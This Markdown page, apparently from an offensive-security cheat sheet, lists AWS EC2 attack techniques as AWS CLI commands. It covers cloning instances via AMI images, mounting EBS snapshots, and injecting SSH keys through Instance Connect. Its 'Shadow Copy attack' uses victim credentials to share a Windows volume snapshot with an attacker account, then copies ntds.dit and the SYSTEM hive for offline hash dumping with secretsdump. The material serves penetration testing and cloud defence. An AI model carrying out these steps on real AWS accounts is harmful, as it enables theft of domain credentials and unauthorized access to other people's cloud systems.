aws-ec2.md (5995B)
1 --- 2 title: "AWS - Service - EC2" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/aws/aws-ec2.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/aws/aws-ec2.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # AWS - Service - EC2 12 13 * [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode 14 15 ## Listing Information About EC2 16 17 ```ps1 18 aws ec2 describe-instances 19 aws ec2 describe-instances --region region 20 aws ec2 describe-instances --instance-ids ID 21 ``` 22 23 ## Copy EC2 using AMI Image 24 25 First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1` 26 27 ```powershell 28 # create a new image for the instance-id 29 $ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 30 31 # add key to AWS 32 $ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 33 34 # create ec2 using the previously created AMI, use the same security group and subnet to connect easily. 35 $ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 36 37 # now you can check the instance 38 aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 39 40 # If needed : edit groups 41 aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 42 43 # be a good guy, clean our instance to avoid any useless cost 44 aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 45 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 46 ``` 47 48 ## Mount EBS volume to EC2 Linux 49 50 :warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken. 51 52 1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type. 53 2. Select the created volume, right click and select the "attach volume" option. 54 3. Select the instance from the instance text box as shown below : `attach ebs volume` 55 56 ```powershell 57 aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone 58 aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device 59 ``` 60 61 4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk` 62 5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf` 63 6. Format the volume to ext4 filesystem using the following command : `sudo mkfs -t ext4 /dev/xvdf` 64 7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume` 65 8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/` 66 9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .` 67 68 ## Shadow Copy attack 69 70 **Requirements**: 71 72 * EC2:CreateSnapshot 73 * [Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) 74 75 **Exploit**: 76 77 1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions 78 2. Run `"Describe-Instances"` and show in list for attacker to select 79 3. Run `"Create-Snapshot"` on volume of selected instance 80 4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account 81 5. Load AWS CLI with Attacker Credentials 82 6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot 83 7. Ssh run `"sudo mkdir /windows"` 84 8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` 85 9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` 86 10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` 87 11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` 88 12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` 89 13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` 90 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path 91 92 ## Access Snapshots 93 94 1. Get the `owner-id` 95 96 ```powershell 97 $ aws --profile flaws sts get-caller-identity 98 "Account": "XXXX26262029", 99 ``` 100 101 2. List snapshots 102 103 ```powershell 104 $ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2 105 "SnapshotId": "snap-XXXX342abd1bdcb89", 106 ``` 107 108 3. Create a volume using the previously obtained `snapshotId` 109 110 ```powershell 111 aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89 112 ``` 113 114 4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine. 115 116 ```ps1 117 ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com 118 lsblk 119 sudo file -s /dev/xvda1 120 sudo mount /dev/xvda1 /mnt 121 ``` 122 123 ## Instance Connect 124 125 Push an SSH key to EC2 instance 126 127 ```powershell 128 # https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ 129 $ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" 130 $ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds 131 ``` 132 133 ## References 134 135 * [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)